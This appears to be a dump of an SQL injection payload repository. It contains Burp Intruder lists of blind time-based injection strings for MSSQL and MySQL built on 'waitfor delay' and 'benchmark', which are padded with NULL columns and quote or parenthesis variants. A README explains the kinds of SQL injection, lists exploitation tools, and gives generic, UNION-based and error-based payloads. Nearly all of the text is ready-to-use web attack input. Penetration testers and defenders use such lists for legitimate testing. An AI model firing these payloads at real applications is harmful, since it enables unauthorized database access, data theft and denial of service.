72 | "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
73 | ,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
74 | ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
75 | ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
76 | ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
77 | ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
78 | ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
79 | ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
80 | '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
81 | '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
82 | "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
83 | "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
84 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
85 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
86 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
87 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
88 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
89 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
90 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
91 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
92 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
93 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
94 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
95 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
96 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
97 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
98 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
99 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
100 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
101 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
102 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
103 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
104 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
105 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
106 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
107 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
--------------------------------------------------------------------------------
/Intruder/payloads-sql-blind/MSSQL/payloads-sql-blind-MSSQL-WHERE.txt:
--------------------------------------------------------------------------------
1 | waitfor delay '0:0:20' /*
2 | waitfor delay '0:0:20' --
3 | ' waitfor delay '0:0:20' /*
4 | ' waitfor delay '0:0:20' --
5 | " waitfor delay '0:0:20' /*
6 | " waitfor delay '0:0:20' --
7 | ) waitfor delay '0:0:20' /*
8 | ) waitfor delay '0:0:20' --
9 | )) waitfor delay '0:0:20' /*
10 | )) waitfor delay '0:0:20' --
11 | ))) waitfor delay '0:0:20' /*
12 | ))) waitfor delay '0:0:20' --
13 | )))) waitfor delay '0:0:20' /*
14 | )))) waitfor delay '0:0:20' --
15 | ))))) waitfor delay '0:0:20' --
16 | )))))) waitfor delay '0:0:20' --
17 | ') waitfor delay '0:0:20' /*
18 | ') waitfor delay '0:0:20' --
19 | ") waitfor delay '0:0:20' /*
20 | ") waitfor delay '0:0:20' --
21 | ')) waitfor delay '0:0:20' /*
22 | ')) waitfor delay '0:0:20' --
23 | ")) waitfor delay '0:0:20' /*
24 | ")) waitfor delay '0:0:20' --
25 | '))) waitfor delay '0:0:20' /*
26 | '))) waitfor delay '0:0:20' --
27 | "))) waitfor delay '0:0:20' /*
28 | "))) waitfor delay '0:0:20' --
29 | ')))) waitfor delay '0:0:20' /*
30 | ')))) waitfor delay '0:0:20' --
31 | ")))) waitfor delay '0:0:20' /*
32 | ")))) waitfor delay '0:0:20' --
33 | '))))) waitfor delay '0:0:20' /*
34 | '))))) waitfor delay '0:0:20' --
35 | "))))) waitfor delay '0:0:20' /*
36 | "))))) waitfor delay '0:0:20' --
37 | ')))))) waitfor delay '0:0:20' /*
38 | ')))))) waitfor delay '0:0:20' --
39 | ")))))) waitfor delay '0:0:20' /*
40 | ")))))) waitfor delay '0:0:20' --
--------------------------------------------------------------------------------
/Intruder/payloads-sql-blind/MySQL/payloads-sql-blind-MySQL-INSERT.txt:
--------------------------------------------------------------------------------
1 | +if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
2 | +if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
3 | +if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
4 | '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
5 | '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
6 | '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
7 | "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
8 | "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
9 | "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
10 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
11 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
12 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
13 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
14 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
15 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
16 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
17 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
18 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
19 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
20 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
21 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
22 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
23 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
24 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
25 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
26 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
27 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
28 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
29 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
30 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
31 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
32 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
33 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
34 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
35 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
36 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
37 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
38 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
39 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
40 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
41 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
42 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
43 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
44 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
45 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
46 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
47 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
48 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
49 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
50 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
51 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
52 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
53 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
54 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
55 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
56 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
57 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
58 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
59 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
60 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
61 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
62 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
63 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
64 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
65 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
66 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
67 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
68 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
69 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
70 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
71 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
72 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
73 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
74 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
75 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
76 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
77 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
78 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
79 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
80 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
81 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
82 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
83 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
84 | +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
85 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
86 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
87 | '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
88 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
89 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
90 | "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
--------------------------------------------------------------------------------
/Intruder/payloads-sql-blind/MySQL/payloads-sql-blind-MySQL-ORDER_BY.txt:
--------------------------------------------------------------------------------
1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
19 |
--------------------------------------------------------------------------------
/Intruder/payloads-sql-blind/MySQL/payloads-sql-blind-MySQL-WHERE.txt:
--------------------------------------------------------------------------------
1 | and 0=benchmark(3000000,MD5(1))%20/*
2 | and 0=benchmark(3000000,MD5(1))%20--
3 | and 0=benchmark(3000000,MD5(1))%20%23
4 | ' and 0=benchmark(3000000,MD5(1))%20/*
5 | ' and 0=benchmark(3000000,MD5(1))%20--
6 | ' and 0=benchmark(3000000,MD5(1))%20%23
7 | " and 0=benchmark(3000000,MD5(1))%20/*
8 | " and 0=benchmark(3000000,MD5(1))%20--
9 | " and 0=benchmark(3000000,MD5(1))%20%23
10 | ) and 0=benchmark(3000000,MD5(1))%20/*
11 | ) and 0=benchmark(3000000,MD5(1))%20--
12 | ) and 0=benchmark(3000000,MD5(1))%20%23
13 | )) and 0=benchmark(3000000,MD5(1))%20/*
14 | )) and 0=benchmark(3000000,MD5(1))%20--
15 | )) and 0=benchmark(3000000,MD5(1))%20%23
16 | ))) and 0=benchmark(3000000,MD5(1))%20/*
17 | ))) and 0=benchmark(3000000,MD5(1))%20--
18 | ))) and 0=benchmark(3000000,MD5(1))%20%23
19 | )))) and 0=benchmark(3000000,MD5(1))%20/*
20 | )))) and 0=benchmark(3000000,MD5(1))%20--
21 | )))) and 0=benchmark(3000000,MD5(1))%20%23
22 | ') and 0=benchmark(3000000,MD5(1))%20/*
23 | ') and 0=benchmark(3000000,MD5(1))%20--
24 | ') and 0=benchmark(3000000,MD5(1))%20%23
25 | ") and 0=benchmark(3000000,MD5(1))%20/*
26 | ") and 0=benchmark(3000000,MD5(1))%20--
27 | ") and 0=benchmark(3000000,MD5(1))%20%23
28 | ')) and 0=benchmark(3000000,MD5(1))%20/*
29 | ')) and 0=benchmark(3000000,MD5(1))%20--
30 | ')) and 0=benchmark(3000000,MD5(1))%20%23
31 | ")) and 0=benchmark(3000000,MD5(1))%20/*
32 | ")) and 0=benchmark(3000000,MD5(1))%20--
33 | ")) and 0=benchmark(3000000,MD5(1))%20%23
34 | '))) and 0=benchmark(3000000,MD5(1))%20/*
35 | '))) and 0=benchmark(3000000,MD5(1))%20--
36 | '))) and 0=benchmark(3000000,MD5(1))%20%23
37 | "))) and 0=benchmark(3000000,MD5(1))%20/*
38 | "))) and 0=benchmark(3000000,MD5(1))%20--
39 | "))) and 0=benchmark(3000000,MD5(1))%20%23
40 | ')))) and 0=benchmark(3000000,MD5(1))%20/*
41 | ')))) and 0=benchmark(3000000,MD5(1))%20--
42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23
43 | ")))) and 0=benchmark(3000000,MD5(1))%20/*
44 | ")))) and 0=benchmark(3000000,MD5(1))%20--
45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 Payload Box
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ### SQL Injection Payload List
2 |
3 | <p align="center">
4 | <img src="https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg"> <img src="https://img.shields.io/github/stars/payloadbox/sql-injection-payload-list?style=social"> <img src="https://img.shields.io/github/forks/payloadbox/sql-injection-payload-list?style=social"> <img src="https://img.shields.io/github/repo-size/payloadbox/sql-injection-payload-list"> <img src="https://img.shields.io/github/license/payloadbox/sql-injection-payload-list"> <img src="https://img.shields.io/github/issues/detail/author/payloadbox/command-injection-payload-list/1">
5 | </p>
6 |
7 | #### SQL Injection
8 |
9 | In this section, we'll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL injection vulnerabilities, and summarize how to prevent SQL injection.
10 |
11 | #### What is SQL injection (SQLi)?
12 |
13 | SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.
14 |
15 | In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.
16 |
17 | <p align="center">
18 | <img src="/Image/sql-injection.svg">
19 | </p>
20 |
21 | | SQL Injection Type | Description
22 | |----------------|-------------------------------|
23 | |In-band SQLi (Classic SQLi)|In-band SQL Injection is the most common and easy-to-exploit of SQL Injection attacks. In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results. The two most common types of in-band SQL Injection are Error-based SQLi and Union-based SQLi. |
24 | |Error-based SQLi |Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database.|
25 | |Union-based SQLi |Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.|
26 | |Inferential SQLi (Blind SQLi)|Inferential SQL Injection, unlike in-band SQLi, may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection. In an inferential SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band (which is why such attacks are commonly referred to as “blind SQL Injection attacks”). Instead, an attacker is able to reconstruct the database structure by sending payloads, observing the web application’s response and the resulting behavior of the database server. The two types of inferential SQL Injection are Blind-boolean-based SQLi and Blind-time-based SQLi.|
27 | |Boolean-based (content-based) Blind SQLi |Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result. Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned.|
28 | |Time-based Blind SQLi |Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. Depending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned.|
29 | |Out-of-band SQLi|Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results. Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable).|
30 | | Voice Based Sql Injection | It is a sql injection attack method that can be applied in applications that provide access to databases with voice command. An attacker could pull information from the database by sending sql queries with sound. |
31 |
32 | #### SQL Injection Vulnerability Scanner Tool's :
33 |
34 | * [SQLMap](https://github.com/sqlmapproject/sqlmap) – Automatic SQL Injection And Database Takeover Tool
35 |
36 | * [jSQL Injection](https://github.com/ron190/jsql-injection) – Java Tool For Automatic SQL Database Injection
37 |
38 | * [BBQSQL](https://github.com/Neohapsis/bbqsql) – A Blind SQL-Injection Exploitation Tool
39 |
40 | * [NoSQLMap](https://github.com/codingo/NoSQLMap) – Automated NoSQL Database Pwnage
41 |
42 | * [Whitewidow](https://www.kitploit.com/2017/05/whitewidow-sql-vulnerability-scanner.html) – SQL Vulnerability Scanner
43 |
44 | * [DSSS](https://github.com/stamparm/DSSS) – Damn Small SQLi Scanner
45 |
46 | * [explo](https://github.com/dtag-dev-sec/explo) – Human And Machine Readable Web Vulnerability Testing Format
47 |
48 | * [Blind-Sql-Bitshifting](https://github.com/awnumar/blind-sql-bitshifting) – Blind SQL-Injection via Bitshifting
49 |
50 | * [Leviathan](https://github.com/leviathan-framework/leviathan) – Wide Range Mass Audit Toolkit
51 |
52 | * [Blisqy](https://github.com/JohnTroony/Blisqy) – Exploit Time-based blind-SQL-injection in HTTP-Headers (MySQL/MariaDB)
53 |
54 | #### Generic SQL Injection Payloads
55 |
56 | ```
57 | '
58 | ''
59 | `
60 | ``
61 | ,
62 | "
63 | ""
64 | /
65 | //
66 | \
67 | \\
68 | ;
69 | ' or "
70 | -- or #
71 | ' OR '1
72 | ' OR 1 -- -
73 | " OR "" = "
74 | " OR 1 = 1 -- -
75 | ' OR '' = '
76 | '='
77 | 'LIKE'
78 | '=0--+
79 | OR 1=1
80 | ' OR 'x'='x
81 | ' AND id IS NULL; --
82 | '''''''''''''UNION SELECT '2
83 | %00
84 | /*…*/
85 | + addition, concatenate (or space in url)
86 | || (double pipe) concatenate
87 | % wildcard attribute indicator
88 |
89 | @variable local variable
90 | @@variable global variable
91 |
92 |
93 | # Numeric
94 | AND 1
95 | AND 0
96 | AND true
97 | AND false
98 | 1-false
99 | 1-true
100 | 1*56
101 | -2
102 |
103 |
104 | 1' ORDER BY 1--+
105 | 1' ORDER BY 2--+
106 | 1' ORDER BY 3--+
107 |
108 | 1' ORDER BY 1,2--+
109 | 1' ORDER BY 1,2,3--+
110 |
111 | 1' GROUP BY 1,2,--+
112 | 1' GROUP BY 1,2,3--+
113 | ' GROUP BY columnnames having 1=1 --
114 |
115 |
116 | -1' UNION SELECT 1,2,3--+
117 | ' UNION SELECT sum(columnname ) from tablename --
118 |
119 |
120 | -1 UNION SELECT 1 INTO @,@
121 | -1 UNION SELECT 1 INTO @,@,@
122 |
123 | 1 AND (SELECT * FROM Users) = 1
124 |
125 | ' AND MID(VERSION(),1,1) = '5';
126 |
127 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
128 |
129 |
130 | Finding the table name
131 |
132 |
133 | Time-Based:
134 | ,(select * from (select(sleep(10)))a)
135 | %2c(select%20*%20from%20(select(sleep(10)))a)
136 | ';WAITFOR DELAY '0:0:30'--
137 |
138 | Comments:
139 |
140 | # Hash comment
141 | /* C-style comment
142 | -- - SQL comment
143 | ;%00 Nullbyte
144 | ` Backtick
145 | ```
146 |
147 | #### Generic Error Based Payloads
148 |
149 | ```
150 | OR 1=1
151 | OR 1=0
152 | OR x=x
153 | OR x=y
154 | OR 1=1#
155 | OR 1=0#
156 | OR x=x#
157 | OR x=y#
158 | OR 1=1--
159 | OR 1=0--
160 | OR x=x--
161 | OR x=y--
162 | OR 3409=3409 AND ('pytW' LIKE 'pytW
163 | OR 3409=3409 AND ('pytW' LIKE 'pytY
164 | HAVING 1=1
165 | HAVING 1=0
166 | HAVING 1=1#
167 | HAVING 1=0#
168 | HAVING 1=1--
169 | HAVING 1=0--
170 | AND 1=1
171 | AND 1=0
172 | AND 1=1--
173 | AND 1=0--
174 | AND 1=1#
175 | AND 1=0#
176 | AND 1=1 AND '%'='
177 | AND 1=0 AND '%'='
178 | AND 1083=1083 AND (1427=1427
179 | AND 7506=9091 AND (5913=5913
180 | AND 1083=1083 AND ('1427=1427
181 | AND 7506=9091 AND ('5913=5913
182 | AND 7300=7300 AND 'pKlZ'='pKlZ
183 | AND 7300=7300 AND 'pKlZ'='pKlY
184 | AND 7300=7300 AND ('pKlZ'='pKlZ
185 | AND 7300=7300 AND ('pKlZ'='pKlY
186 | AS INJECTX WHERE 1=1 AND 1=1
187 | AS INJECTX WHERE 1=1 AND 1=0
